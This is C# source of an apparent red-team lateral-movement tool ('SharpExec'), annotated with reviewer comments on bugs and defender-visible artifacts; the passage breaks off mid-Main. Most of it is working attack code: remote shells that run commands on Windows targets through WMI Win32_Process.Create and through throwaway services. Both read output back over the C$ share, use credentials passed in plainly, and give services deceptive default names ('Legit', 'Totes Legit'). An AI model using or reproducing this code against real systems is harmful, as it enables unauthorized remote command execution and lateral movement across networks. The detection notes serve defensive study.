//Handles WMI semi-interactive shell
/// <summary>
/// Semi-interactive remote shell over WMI. Each command typed at the prompt is started on
/// <paramref name="rhost"/> through <c>Win32_Process.Create</c> (scope <c>\\rhost\root\cimv2</c>)
/// with stdout and stderr redirected to a fixed file on the target's C: drive; after a fixed wait the
/// file is read back over the <c>C$</c> administrative share, echoed to the console and deleted.
/// Two near-identical loops follow: the first runs when <paramref name="username"/> and
/// <paramref name="password"/> are both empty and uses the caller's current Windows identity for WMI and
/// for the share read; the second passes explicit credentials to the WMI connection and wraps the share
/// read in the project's <c>Impersonation</c> type.
/// </summary>
/// <param name="rhost">Target host name or address; used in the WMI scope and in the UNC output path.</param>
/// <param name="executionPath">Not referenced anywhere in this method.</param>
/// <param name="cmdArgs">First command to run; later commands are read from the console until "exit".</param>
/// <param name="domain">Account domain; only used in the credentialed loop (as <c>domain\username</c>).</param>
/// <param name="username">Account name; empty together with <paramref name="password"/> selects the no-credential loop.</param>
/// <param name="password">Account password; only used in the credentialed loop.</param>
/// <remarks>
/// Defender-relevant artifacts visible in this code: the remote command line is always
/// <c>cmd /Q /c &lt;command&gt; &gt; C:\__LegitFile 2&gt;&amp;1</c>, and <c>\\rhost\C$\__LegitFile</c> is read and
/// deleted from the operator's side, so the fixed file name and the admin-share access are the observable
/// host and network indicators. put/get failures are swallowed by catch-all blocks that print a generic
/// message; WMI and share-access exceptions in the command branch propagate to the caller.
/// NOTE(review): <see cref="Console.ReadLine"/> returns null at end of input, which makes the loop
/// condition's <c>ToLower()</c> throw a <see cref="NullReferenceException"/>.
/// NOTE(review): the "cd" handling uses a substring match (<c>Contains("cd")</c>), so any command text
/// containing those two letters enters that branch and indexes <c>Split(' ')[1]</c>.
/// </remarks>
public void wmiexec(string rhost, string executionPath, string cmdArgs, string domain, string username, string password)
{
    Console.WriteLine();
    Console.WriteLine("[+] Using WMIExec module semi-interactive shell");
    Console.WriteLine("[+] Be careful what you execute");
    Console.WriteLine();
    // Remote working directory tracked on the operator side; passed as CurrentDirectory to each Create call
    // and updated by the cd handling below. Starts at the drive root.
    string pwd = @"C:\";
    // Holds the "path not found" line from the last command's output; used to reject a failed cd.
    string ln1 = "";
    if (username == "" && password == "")
    {
        // No-credential loop: WMI connection and C$ file access both run under the caller's current identity.
        while (cmdArgs.ToLower() != "exit")
        {
            //Handles uploading file to current remote directory
            // Expected syntax: "put <localPath> <remoteName>". Split on single spaces, so paths containing
            // spaces end up in the catch below.
            if (cmdArgs.ToLower().Contains("put "))
            {
                try
                {
                    Char delimiter = ' ';
                    String[] put = cmdArgs.Split(delimiter);
                    string localPath = put[1];
                    string remotePath;
                    // Avoid a doubled backslash when pwd is still the drive root.
                    if (pwd == @"C:\")
                    {
                        remotePath = pwd + put[2];
                    }
                    else
                    {
                        remotePath = pwd + @"\" + put[2];
                    }
                    // FileAddRemove is a project type; its transport is not visible here.
                    FileAddRemove uploadFile = new FileAddRemove();
                    uploadFile.upload(localPath, remotePath, rhost, username, password, domain);
                }
                catch
                {
                    // Catch-all: the underlying exception is discarded and only a generic message is shown.
                    Console.WriteLine();
                    Console.WriteLine("[-] Something went wrong with the put command. Check syntax and try again. ");
                    Console.WriteLine();
                }
            }
            //Handles downloading file from current remote directory
            // Expected syntax: "get <remoteName> <localPath>" (argument order is the reverse of put).
            else if (cmdArgs.ToLower().Contains("get "))
            {
                try
                {
                    Char delimiter = ' ';
                    String[] put = cmdArgs.Split(delimiter);
                    string localPath = put[2];
                    string remotePath;
                    if (pwd == @"C:\")
                    {
                        remotePath = pwd + put[1];
                    }
                    else
                    {
                        remotePath = pwd + @"\" + put[1];
                    }
                    FileAddRemove uploadFile = new FileAddRemove();
                    uploadFile.get(localPath, remotePath, rhost, username, password, domain);
                }
                catch
                {
                    // Catch-all, same as for put.
                    Console.WriteLine();
                    Console.WriteLine("[-] Something went wrong with the get command. Check syntax and try again. ");
                    Console.WriteLine();
                }
            }
            // Substring match: any command text containing "help" shows the menu instead of running.
            else if (cmdArgs.ToLower().Contains("help"))
            {
                Console.WriteLine("Commands Description");
                Console.WriteLine("-------- -----------");
                Console.WriteLine("put Upload file from local directory to current shell directory, put fullLocalPath\\File.txt File.txt");
                Console.WriteLine("get Download file from current shell directory to local directory, get File.txt fullLocalPath\\File.txt");
                Console.WriteLine("help Show help menu");
                Console.WriteLine("exit Exit shell");
            }
            else
            {
                // Run the command on the target through WMI Win32_Process.Create, in the tracked directory,
                // with stdout/stderr redirected to a fixed file on the target's C: drive.
                ManagementScope myScope = new ManagementScope(String.Format("\\\\{0}\\root\\cimv2", rhost));
                ManagementClass myClass = new ManagementClass(myScope, new ManagementPath("Win32_Process"), new ObjectGetOptions());
                ManagementBaseObject myParams = myClass.GetMethodParameters("Create");
                myParams["CurrentDirectory"] = pwd;
                // cmdArgs is concatenated unquoted; cmd.exe interprets any operators it contains.
                myParams["CommandLine"] = @"cmd /Q /c " + cmdArgs + @" > C:\__LegitFile 2>&1";
                // The Create return object (status / process id) is not captured, so a failed Create is only
                // noticed by the absence of an output file.
                myClass.InvokeMethod("Create", myParams, null);
                //Allows enough time to go elapse so output can be read
                // Fixed 2 s wait; commands that run longer yield missing or partial output.
                System.Threading.Thread.Sleep(2000);
                //Handles reading output
                // Output is read back over the C$ administrative share and the file is deleted afterwards.
                string output = @"\\" + rhost + @"\C$\__LegitFile";
                if (File.Exists(output))
                {
                    using (StreamReader file = new StreamReader(output))
                    {
                        int counter = 0; // incremented per line but never read
                        string ln;
                        //Reads output file
                        while ((ln = file.ReadLine()) != null)
                        {
                            //Helps handle bad path
                            // Matches the English cmd.exe message; presumably does not match on
                            // other-locale targets — TODO confirm.
                            if (ln.Contains("The system cannot find the path specified."))
                            {
                                ln1 = ln;
                            }
                            Console.WriteLine();
                            Console.WriteLine(ln);
                            counter++;
                        }
                        // Explicit Close before the using block's Dispose, then remove the remote file.
                        file.Close();
                        File.Delete(output);
                    }
                }//End if file exits
                //Handles changing directories
                // NOTE(review): substring match, not a "cd" token check (see remarks).
                if (cmdArgs.ToLower().Contains("cd"))
                {
                    //Handles if bad directory
                    if (ln1.Contains("The system cannot find the path specified."))
                    {
                        // Remote cd failed: keep pwd unchanged and clear the marker for the next command.
                        ln1 = "";
                    }
                    else
                    {
                        /*Handles switching to full path - cd C:\Users\ATTE
                         * Else handles new directory - cd Users\ATTE */
                        if (cmdArgs.ToLower().Contains(":"))
                        {
                            // Absolute path: take the second token as the new pwd.
                            pwd = cmdArgs.Split(' ')[1];
                        }
                        else
                        {
                            string pwdOutput = pwd + @">";
                            if (pwdOutput.Contains(@":\>"))
                            {
                                // At the drive root: append the directory directly after the trailing backslash.
                                pwd = pwdOutput.Replace(">", cmdArgs.Split(' ')[1]);
                            }
                            else if (cmdArgs != "cd ..")
                            {
                                // Below the root: insert a separator before appending.
                                pwd = pwd + @">";
                                pwd = pwd.Replace(">", @"\") + cmdArgs.Split(' ')[1];
                            }
                        }
                    }
                    //Handles cd .. functionality
                    // Drops the last path segment; never moves above the C: root.
                    if (cmdArgs.ToLower().Contains(".."))
                    {
                        string input = pwd;
                        string backslash = @"\";
                        int index = input.LastIndexOf(@backslash);
                        if (index > 0)
                        {
                            pwd = input.Substring(0, index);
                            if (pwd == "C:")
                            {
                                pwd = @"C:\";
                            }
                        }
                        else
                        {
                            pwd = @"C:\";
                        }
                    }
                }//End if cmdArgs contain cd
            }
            Console.WriteLine();
            Console.Write(pwd + @">");
            // NOTE(review): null at end of input; the loop condition then dereferences it.
            cmdArgs = Console.ReadLine();
        }
    }
    else
    {
        // Credentialed loop: same command handling, but explicit domain\username + password are supplied to
        // the WMI connection and the share read runs inside the project's Impersonation scope.
        while (cmdArgs.ToLower() != "exit")
        {
            //Handles uploading file to current remote directory
            // Expected syntax: "put <localPath> <remoteName>".
            if (cmdArgs.ToLower().Contains("put "))
            {
                try
                {
                    Char delimiter = ' ';
                    String[] put = cmdArgs.Split(delimiter);
                    string localPath = put[1];
                    string remotePath;
                    // Avoid a doubled backslash when pwd is still the drive root.
                    if (pwd == @"C:\")
                    {
                        remotePath = pwd + put[2];
                    }
                    else
                    {
                        remotePath = pwd + @"\" + put[2];
                    }
                    FileAddRemove uploadFile = new FileAddRemove();
                    uploadFile.upload(localPath, remotePath, rhost, username, password, domain);
                }
                catch
                {
                    // Catch-all: underlying exception discarded.
                    Console.WriteLine();
                    Console.WriteLine("[-] Something went wrong with the put command. Check syntax and try again. ");
                    Console.WriteLine();
                }
            }
            //Handles downloading file from current remote directory
            // Expected syntax: "get <remoteName> <localPath>".
            else if (cmdArgs.ToLower().Contains("get "))
            {
                try
                {
                    Char delimiter = ' ';
                    String[] put = cmdArgs.Split(delimiter);
                    string localPath = put[2];
                    string remotePath;
                    if (pwd == @"C:\")
                    {
                        remotePath = pwd + put[1];
                    }
                    else
                    {
                        remotePath = pwd + @"\" + put[1];
                    }
                    FileAddRemove uploadFile = new FileAddRemove();
                    uploadFile.get(localPath, remotePath, rhost, username, password, domain);
                }
                catch
                {
                    // Catch-all, same as for put.
                    Console.WriteLine();
                    Console.WriteLine("[-] Something went wrong with the get command. Check syntax and try again. ");
                    Console.WriteLine();
                }
            }
            // Substring match: any command text containing "help" shows the menu instead of running.
            else if (cmdArgs.ToLower().Contains("help"))
            {
                Console.WriteLine("Commands Description");
                Console.WriteLine("-------- -----------");
                Console.WriteLine("put Upload file from local directory to current shell directory, put fullLocalPath\\File.txt File.txt");
                Console.WriteLine("get Download file from current shell directory to local directory, get File.txt fullLocalPath\\File.txt");
                Console.WriteLine("help Show help menu");
                Console.WriteLine("exit Exit shell");
            }
            else
            {
                // Explicit-credential WMI connection: impersonation level Impersonate, privileges enabled,
                // 30 s connection timeout, user given as domain\username.
                ConnectionOptions myConnection = new ConnectionOptions();
                string uname = domain + @"\" + username;
                myConnection.Impersonation = ImpersonationLevel.Impersonate;
                myConnection.EnablePrivileges = true;
                myConnection.Timeout = new TimeSpan(0, 0, 30);
                myConnection.Username = uname;
                myConnection.Password = password;
                ManagementScope myScope = new ManagementScope(String.Format("\\\\{0}\\root\\cimv2", rhost), myConnection);
                ManagementClass myClass = new ManagementClass(myScope, new ManagementPath("Win32_Process"), new ObjectGetOptions());
                ManagementBaseObject myParams = myClass.GetMethodParameters("Create");
                myParams["CurrentDirectory"] = pwd;
                // cmdArgs is concatenated unquoted; stdout/stderr go to a fixed file on the target's C: drive.
                myParams["CommandLine"] = @"cmd /Q /c " + cmdArgs + @" > C:\__LegitFile 2>&1";
                // Create return object is not captured (see no-credential loop).
                myClass.InvokeMethod("Create", myParams, null);
                //Allows enough time to go elapse so output can be read
                // Fixed 2 s wait; longer-running commands yield missing or partial output.
                System.Threading.Thread.Sleep(2000);
                // Impersonation is a project type; presumably runs the share read as the supplied account — confirm.
                using (new Impersonation(domain, username, password))
                {
                    //Handles reading output
                    // Output is read back over the C$ administrative share and the file is deleted afterwards.
                    string output = @"\\" + rhost + @"\C$\__LegitFile";
                    if (File.Exists(output))
                    {
                        using (StreamReader file = new StreamReader(output))
                        {
                            int counter = 0; // incremented per line but never read
                            string ln;
                            //Reads output file
                            while ((ln = file.ReadLine()) != null)
                            {
                                //Helps handle bad path
                                // English cmd.exe message; presumably locale-dependent — TODO confirm.
                                if (ln.Contains("The system cannot find the path specified."))
                                {
                                    ln1 = ln;
                                }
                                Console.WriteLine();
                                Console.WriteLine(ln);
                                counter++;
                            }
                            file.Close();
                            File.Delete(output);
                        }
                    } //End if file exits
                } //end impersonation
                //Handles changing directories
                // NOTE(review): substring match, not a "cd" token check (see remarks).
                if (cmdArgs.ToLower().Contains("cd"))
                {
                    //Handles if bad directory
                    if (ln1.Contains("The system cannot find the path specified."))
                    {
                        // Remote cd failed: keep pwd unchanged and clear the marker.
                        ln1 = "";
                    }
                    else
                    {
                        /*Handles switching to full path - cd C:\Users\ATTE
                         * Else handles new directory - cd Users\ATTE */
                        if (cmdArgs.ToLower().Contains(":"))
                        {
                            // Absolute path: take the second token as the new pwd.
                            pwd = cmdArgs.Split(' ')[1];
                        }
                        else
                        {
                            string pwdOutput = pwd + @">";
                            if (pwdOutput.Contains(@":\>"))
                            {
                                // At the drive root: append directly after the trailing backslash.
                                pwd = pwdOutput.Replace(">", cmdArgs.Split(' ')[1]);
                            }
                            else if (cmdArgs != "cd ..")
                            {
                                // Below the root: insert a separator before appending.
                                pwd = pwd + @">";
                                pwd = pwd.Replace(">", @"\") + cmdArgs.Split(' ')[1];
                            }
                        }
                    }
                    //Handles cd .. functionality
                    // Drops the last path segment; never moves above the C: root.
                    if (cmdArgs.ToLower().Contains(".."))
                    {
                        string input = pwd;
                        string backslash = @"\";
                        int index = input.LastIndexOf(@backslash);
                        if (index > 0)
                        {
                            pwd = input.Substring(0, index);
                            if (pwd == "C:")
                            {
                                pwd = @"C:\";
                            }
                        }
                        else
                        {
                            pwd = @"C:\";
                        }
                    }
                }//End if cmdArgs contain cd
            }
            Console.WriteLine();
            Console.Write(pwd + @">");
            // NOTE(review): null at end of input; the loop condition then dereferences it.
            cmdArgs = Console.ReadLine();
        }
    }
}
//Handles SMBExec semi-interactive shell functionality
/// <summary>
/// Semi-interactive remote shell over the Service Control Manager. For each command typed at the prompt
/// the method opens the SCM on <paramref name="rhost"/>, creates a demand-start own-process service whose
/// binary path is a <c>%COMSPEC%</c> one-liner (the command's output is redirected to
/// <c>\\rhost\C$\__LegitFile</c> via a batch file written to and removed from <c>%TEMP%</c>), starts it,
/// waits a fixed 2 s, deletes the service, then reads and deletes the output file over the <c>C$</c> share.
/// Two near-identical loops follow: the first runs when <paramref name="username"/> and
/// <paramref name="password"/> are both empty (caller's current identity); the second wraps the whole
/// service round-trip and the share read in the project's <c>Impersonation</c> type.
/// The prompt is the fixed string <c>C:\WINDOWS\system32&gt;</c>; "cd" is rejected with a message.
/// </summary>
/// <param name="rhost">Target host name or address for the SCM connection and the UNC output path.</param>
/// <param name="serviceName">Name of the service created on the target for each command.</param>
/// <param name="serviceDisplayName">Display name of that service.</param>
/// <param name="cmdArgs">First command to run; later commands are read from the console until "exit".</param>
/// <param name="domain">Account domain; used only in the credentialed loop.</param>
/// <param name="username">Account name; empty together with <paramref name="password"/> selects the no-credential loop.</param>
/// <param name="password">Account password; used only in the credentialed loop.</param>
/// <exception cref="Win32Exception">
/// Thrown (and not caught in this method) when the SCM handle returned for <paramref name="rhost"/> is invalid;
/// this ends the shell loop.
/// </exception>
/// <remarks>
/// Defender-relevant artifacts visible in this code: a service install/start/delete cycle on the target per
/// command (service installation is recorded by the SCM in the System event log), a transient
/// <c>%TEMP%\execute.bat</c>, and the fixed output file <c>C:\__LegitFile</c> accessed over the <c>C$</c> share.
/// Service start and delete failures are caught and only reported to the console.
/// NOTE(review): <see cref="Console.ReadLine"/> returns null at end of input, which makes the loop
/// condition's <c>ToLower()</c> throw a <see cref="NullReferenceException"/>.
/// NOTE(review): after a command the prompt is re-printed only inside the <c>File.Exists(output)</c> branch,
/// so when no output file appears the shell waits for input without a prompt.
/// </remarks>
public void smbExec(string rhost, string serviceName, string serviceDisplayName, string cmdArgs, string domain, string username, string password)
{
    Console.WriteLine();
    Console.WriteLine("[+] Using SMBExec module semi-interactive shell");
    Console.WriteLine("[+] Be careful what you execute");
    Console.WriteLine();
    if (username == "" && password == "")
    {
        // No-credential loop: SCM calls and C$ file access run under the caller's current identity.
        Console.Write(@"C:\WINDOWS\system32>");
        while (cmdArgs.ToLower() != "exit")
        {
            //Handles uploading file to current remote directory
            // Expected syntax: "put <localPath> <remotePath>"; both are taken verbatim (no directory tracking here).
            if (cmdArgs.ToLower().Contains("put "))
            {
                try
                {
                    Char delimiter = ' ';
                    String[] put = cmdArgs.Split(delimiter);
                    string localPath = put[1];
                    string remotePath = put[2];
                    // FileAddRemove is a project type; its transport is not visible here.
                    FileAddRemove uploadFile = new FileAddRemove();
                    uploadFile.upload(localPath, remotePath, rhost, username, password, domain);
                    Console.WriteLine();
                    Console.Write(@"C:\WINDOWS\system32>");
                }
                catch
                {
                    // Catch-all: exception discarded; note the prompt is not re-printed on this path.
                    Console.WriteLine();
                    Console.WriteLine("[-] Something went wrong with the put command. Check syntax and try again. ");
                    Console.WriteLine();
                }
            }
            //Handles downloading file from current remote directory
            // Expected syntax: "get <remotePath> <localPath>" (reverse order of put).
            else if (cmdArgs.ToLower().Contains("get "))
            {
                try
                {
                    Char delimiter = ' ';
                    String[] put = cmdArgs.Split(delimiter);
                    string localPath = put[2];
                    string remotePath = put[1];
                    FileAddRemove uploadFile = new FileAddRemove();
                    uploadFile.get(localPath, remotePath, rhost, username, password, domain);
                    Console.WriteLine();
                    Console.Write(@"C:\WINDOWS\system32>");
                }
                catch
                {
                    // Catch-all, same as for put.
                    Console.WriteLine();
                    Console.WriteLine("[-] Something went wrong with the get command. Check syntax and try again. ");
                    Console.WriteLine();
                }
            }
            // Substring match: any command text containing "help" shows the menu instead of running.
            else if (cmdArgs.ToLower().Contains("help"))
            {
                Console.WriteLine("Commands Description");
                Console.WriteLine("-------- -----------");
                Console.WriteLine("put Upload file from local directory to current shell directory, put fullLocalPath\\File.txt fullLocalPath\\File.txt");
                Console.WriteLine("get Download file from current shell directory to local directory, get fullLocalPath\\File.txt fullLocalPath\\File.txt");
                Console.WriteLine("help Show help menu");
                Console.WriteLine("exit Exit shell");
                Console.WriteLine();
                Console.Write(@"C:\WINDOWS\system32>");
            }
            // Substring match: any command text containing "cd" is rejected, not only a cd command.
            else if (cmdArgs.ToLower().Contains("cd"))
            {
                Console.WriteLine();
                Console.WriteLine("You can't CD under SMBEXEC. Use full paths.");
                Console.WriteLine();
                Console.Write(@"C:\WINDOWS\system32>");
            }
            else
            {
                // NativeMethods is a project P/Invoke wrapper; the handles are presumably SafeHandle-based
                // since they are used with `using` — confirm.
                using (var scmHandle = NativeMethods.OpenSCManager(rhost, null, NativeMethods.SCM_ACCESS.SC_MANAGER_CREATE_SERVICE))
                {
                    // Not caught anywhere in this method: an invalid SCM handle terminates the shell.
                    if (scmHandle.IsInvalid)
                    {
                        throw new Win32Exception();
                    }
                    // Binary path: cmd.exe writes a batch file containing the command (with output redirected
                    // to the fixed file on the C$ share) into %TEMP%, runs it, then deletes it.
                    // cmdArgs is concatenated unquoted; the caret-escaped operators are consumed by the outer cmd.
                    using ( var serviceHandle = NativeMethods.CreateService( scmHandle, serviceName, serviceDisplayName, NativeMethods.SERVICE_ACCESS.SERVICE_ALL_ACCESS, NativeMethods.SERVICE_TYPES.SERVICE_WIN32_OWN_PROCESS, NativeMethods.SERVICE_START_TYPES.SERVICE_DEMAND_START, NativeMethods.SERVICE_ERROR_CONTROL.SERVICE_ERROR_IGNORE, @"%COMSPEC% /Q /c echo " + cmdArgs + @" ^> \\" + rhost + @"\C$\__LegitFile 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat", null, IntPtr.Zero, null, null, null))
                    {
                        try
                        {
                            NativeMethods.StartService(serviceHandle, 0, null);
                        }
                        catch
                        {
                            // Start failure is only reported; the delete below still runs.
                            Console.WriteLine("[-]Error. Please check that you have appropriate rights and/or that service doesn't already exist");
                        }
                        try
                        {
                            // Fixed 2 s wait before removing the service regardless of start outcome.
                            System.Threading.Thread.Sleep(2000);
                            NativeMethods.DeleteService(serviceHandle);
                        }
                        catch
                        {
                            // Delete failure leaves the service on the target; only a message is shown.
                            Console.WriteLine("[-] Error removing service");
                            Console.WriteLine();
                            Console.WriteLine("[-] Please delete service manually");
                            Console.WriteLine();
                        }
                    }
                }
                // Output is read back over the C$ administrative share and the file is deleted afterwards.
                string output = @"\\" + rhost + @"\C$\__LegitFile";
                if (File.Exists(output))
                {
                    using (StreamReader file = new StreamReader(output))
                    {
                        int counter = 0; // incremented per line but never read
                        string ln;
                        while ((ln = file.ReadLine()) != null)
                        {
                            Console.WriteLine();
                            Console.WriteLine(ln);
                            counter++;
                        }
                        file.Close();
                        File.Delete(output);
                        // Prompt only re-appears when an output file existed (see remarks).
                        Console.WriteLine();
                        Console.Write(@"C:\WINDOWS\system32>");
                    }
                }
            }
            // NOTE(review): null at end of input; the loop condition then dereferences it.
            cmdArgs = Console.ReadLine();
        }
    }
    else
    {
        // Credentialed loop: identical command handling, with the SCM round-trip and the share read
        // wrapped in the project's Impersonation scope for the supplied account.
        Console.Write(@"C:\WINDOWS\system32>");
        while (cmdArgs.ToLower() != "exit")
        {
            //Handles uploading file to current remote directory
            // Expected syntax: "put <localPath> <remotePath>".
            if (cmdArgs.ToLower().Contains("put "))
            {
                try
                {
                    Char delimiter = ' ';
                    String[] put = cmdArgs.Split(delimiter);
                    string localPath = put[1];
                    string remotePath = put[2];
                    FileAddRemove uploadFile = new FileAddRemove();
                    uploadFile.upload(localPath, remotePath, rhost, username, password, domain);
                    Console.WriteLine();
                    Console.Write(@"C:\WINDOWS\system32>");
                }
                catch
                {
                    // Catch-all: exception discarded; prompt not re-printed on this path.
                    Console.WriteLine();
                    Console.WriteLine("[-] Something went wrong with the put command. Check syntax and try again. ");
                    Console.WriteLine();
                }
            }
            //Handles downloading file from current remote directory
            // Expected syntax: "get <remotePath> <localPath>".
            else if (cmdArgs.ToLower().Contains("get "))
            {
                try
                {
                    Char delimiter = ' ';
                    String[] put = cmdArgs.Split(delimiter);
                    string localPath = put[2];
                    string remotePath = put[1];
                    FileAddRemove uploadFile = new FileAddRemove();
                    uploadFile.get(localPath, remotePath, rhost, username, password, domain);
                    Console.WriteLine();
                    Console.Write(@"C:\WINDOWS\system32>");
                }
                catch
                {
                    // Catch-all, same as for put.
                    Console.WriteLine();
                    Console.WriteLine("[-] Something went wrong with the get command. Check syntax and try again. ");
                    Console.WriteLine();
                }
            }
            // Substring match: any command text containing "help" shows the menu instead of running.
            else if (cmdArgs.ToLower().Contains("help"))
            {
                Console.WriteLine("Commands Description");
                Console.WriteLine("-------- -----------");
                Console.WriteLine("put Upload file from local directory to current shell directory, put fullLocalPath\\File.txt fullLocalPath\\File.txt");
                Console.WriteLine("get Download file from current shell directory to local directory, get fullLocalPath\\File.txt fullLocalPath\\File.txt");
                Console.WriteLine("help Show help menu");
                Console.WriteLine("exit Exit shell");
                Console.WriteLine();
                Console.Write(@"C:\WINDOWS\system32>");
            }
            // Substring match: any command text containing "cd" is rejected.
            else if (cmdArgs.ToLower().Contains("cd"))
            {
                Console.WriteLine();
                Console.WriteLine("You can't CD under SMBEXEC. Use full paths.");
                Console.WriteLine();
                Console.Write(@"C:\WINDOWS\system32>");
            }
            else
            {
                // Impersonation is a project type; presumably runs the SCM calls and the share read as the
                // supplied account — confirm.
                using (new Impersonation(domain, username, password))
                {
                    using (var scmHandle = NativeMethods.OpenSCManager(rhost, null, NativeMethods.SCM_ACCESS.SC_MANAGER_CREATE_SERVICE))
                    {
                        // Not caught anywhere in this method: an invalid SCM handle terminates the shell.
                        if (scmHandle.IsInvalid)
                        {
                            throw new Win32Exception();
                        }
                        // Same batch-file-in-%TEMP% binary path as the no-credential loop.
                        using ( var serviceHandle = NativeMethods.CreateService( scmHandle, serviceName, serviceDisplayName, NativeMethods.SERVICE_ACCESS.SERVICE_ALL_ACCESS, NativeMethods.SERVICE_TYPES.SERVICE_WIN32_OWN_PROCESS, NativeMethods.SERVICE_START_TYPES.SERVICE_DEMAND_START, NativeMethods.SERVICE_ERROR_CONTROL.SERVICE_ERROR_IGNORE, @"%COMSPEC% /Q /c echo " + cmdArgs + @" ^> \\" + rhost + @"\C$\__LegitFile 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat", null, IntPtr.Zero, null, null, null))
                        {
                            try
                            {
                                NativeMethods.StartService(serviceHandle, 0, null);
                            }
                            catch
                            {
                                // Start failure is only reported; the delete below still runs.
                                Console.WriteLine("[-] Error starting service");
                                Console.WriteLine();
                                Console.WriteLine("[-] Please check that you have appropriate rights and/or that service doesn't already exist");
                            }
                            try
                            {
                                // Fixed 2 s wait before removing the service regardless of start outcome.
                                System.Threading.Thread.Sleep(2000);
                                NativeMethods.DeleteService(serviceHandle);
                            }
                            catch
                            {
                                // Delete failure leaves the service on the target; only a message is shown.
                                Console.WriteLine("[-] Error removing service");
                                Console.WriteLine();
                                Console.WriteLine("[-] Please delete service manually");
                                Console.WriteLine();
                            }
                        }
                    }
                    // Output is read back over the C$ administrative share (still impersonated) and deleted.
                    string output = @"\\" + rhost + @"\C$\__LegitFile";
                    if (File.Exists(output))
                    {
                        using (StreamReader file = new StreamReader(output))
                        {
                            int counter = 0; // incremented per line but never read
                            string ln;
                            while ((ln = file.ReadLine()) != null)
                            {
                                Console.WriteLine();
                                Console.WriteLine(ln);
                                counter++;
                            }
                            file.Close();
                            File.Delete(output);
                            // Prompt only re-appears when an output file existed (see remarks).
                            Console.WriteLine();
                            Console.Write(@"C:\WINDOWS\system32>");
                        }
                    }
                }
            }
            // NOTE(review): null at end of input; the loop condition then dereferences it.
            cmdArgs = Console.ReadLine();
        }
    }
}
/// <summary>
/// Entry point. With no arguments, or "help" / "?" as the first argument, prints the help menu.
/// Otherwise parses <c>key=value</c> arguments (keys compared case-insensitively; tokens without "="
/// are ignored; a repeated key keeps the last value), optionally uploads a file first, then dispatches
/// to one of the modules selected by <c>-m</c>: psexec, wmi, wmiexec or smbexec.
/// Required: <c>-m</c> (module) and <c>-i</c> (target host); missing either prints a message and returns.
/// Optional: <c>-e</c> execution path, <c>-d</c> domain, <c>-u</c> user, <c>-p</c> password, <c>-c</c> command,
/// <c>-f</c> local file to upload, <c>--serviceName</c>, <c>--serviceDisplay</c>.
/// </summary>
/// <param name="args">Raw command-line arguments in <c>key=value</c> form.</param>
/// <remarks>
/// Credentials arrive as plain command-line arguments, so they are visible to any process command-line
/// auditing on the operator host. Every module call is wrapped in a catch-all that prints a generic
/// message and discards the exception.
/// NOTE(review): the <c>--serviceDisplay</c> branch checks <c>ContainsKey("--serviceDisplay")</c> but then
/// reads <c>arguments["-serviceDisplay"]</c>; the key mismatch means this branch throws
/// <c>KeyNotFoundException</c> whenever the option is supplied.
/// NOTE(review): <c>fileUploaded</c> is set whenever <c>-f</c> is present, independent of whether
/// <c>-e</c> was given or the upload succeeded.
/// </remarks>
static void Main(string[] args)
{
    //Display help menu
    if (args.Length <= 0 || args[0] == "help" || args[0] == "?")
    {
        // Help is a project type.
        Help please = new Help();
        please.help();
    }
    else
    {
        //Get args
        // Case-insensitive key lookup; only "key=value" tokens with a non-empty key are recorded.
        var comparer = StringComparer.OrdinalIgnoreCase;
        var arguments = new Dictionary <string, string>(comparer);
        foreach (string argument in args)
        {
            int idx = argument.IndexOf('=');
            if (idx > 0)
            {
                arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
            }
        }
        //set variables
        // Defaults; service name/display name are the fallback when the --service* options are absent.
        string module = "";
        string rhost = "";
        string domain = "";
        string username = "";
        string password = "";
        string executionPath = "";
        string cmdArgs = "";
        string serviceName = "Legit";
        string serviceDisplayName = "Totes Legit";
        string uploadPath = "";
        bool fileUploaded = false;
        //Check if key created and if so set variable
        if (arguments.ContainsKey("-m"))
        {
            module = arguments["-m"];
        }
        else
        {
            Console.WriteLine("[-] Missing required argument -m");
            Console.WriteLine();
            Console.WriteLine("[-] SharpExec did not run");
            return;
        }
        if (arguments.ContainsKey("-i"))
        {
            rhost = arguments["-i"];
        }
        else
        {
            Console.WriteLine("[-] Missing required argument -i");
            Console.WriteLine();
            Console.WriteLine("[-] SharpExec did not run");
            return;
        }
        if (arguments.ContainsKey("-e"))
        {
            executionPath = arguments["-e"];
        }
        if (arguments.ContainsKey("-d"))
        {
            domain = arguments["-d"];
        }
        if (arguments.ContainsKey("-u"))
        {
            username = arguments["-u"];
        }
        if (arguments.ContainsKey("-p"))
        {
            password = arguments["-p"];
        }
        if (arguments.ContainsKey("-c"))
        {
            cmdArgs = arguments["-c"];
        }
        if (arguments.ContainsKey("-f"))
        {
            uploadPath = arguments["-f"];
            // Set on presence of -f alone (see remarks).
            fileUploaded = true;
        }
        if (arguments.ContainsKey("--serviceName"))
        {
            serviceName = arguments["--serviceName"];
        }
        if (arguments.ContainsKey("--serviceDisplay"))
        {
            // NOTE(review): key mismatch with the ContainsKey check above ("-serviceDisplay" vs "--serviceDisplay").
            serviceDisplayName = arguments["-serviceDisplay"];
        }
        //Modules
        //Upload file
        // With full credentials the upload runs inside the project's Impersonation scope; with -f/-e but
        // incomplete credentials it runs under the current identity. Either way a fixed 3 s wait follows.
        if (uploadPath != "" && executionPath != "" && domain != "" && username != "" && password != "")
        {
            using (new Impersonation(domain, username, password))
            {
                try
                {
                    FileAddRemove uploadFile = new FileAddRemove();
                    uploadFile.upload(uploadPath, executionPath, rhost, username, password, domain);
                    System.Threading.Thread.Sleep(3000);
                }
                catch
                {
                    // Catch-all: exception discarded; execution continues into module dispatch.
                    Console.WriteLine("[-] Something went wrong with file upload. Please check syntax and run again");
                }
            }
        }
        else if (uploadPath != "" && executionPath != "")
        {
            try
            {
                FileAddRemove uploadFile = new FileAddRemove();
                uploadFile.upload(uploadPath, executionPath, rhost, username, password, domain);
                System.Threading.Thread.Sleep(3000);
            }
            catch
            {
                // Catch-all: exception discarded; execution continues into module dispatch.
                Console.WriteLine("[-] Something went wrong with file upload. Please check syntax and run again");
            }
        }
        //PSExec
        // ManageService / ManageProcess / FileAddRemove are project types.
        if (module.ToLower() == "psexec")
        {
            try
            {
                ManageService create = new ManageService();
                create.PSExec(rhost, serviceName, serviceDisplayName, executionPath, cmdArgs, domain, username, password, fileUploaded);
                //If file was uploaded remove it
                // Waits for operator confirmation (ENTER) before deleting the uploaded file from the target.
                if (uploadPath != "" && executionPath != "")
                {
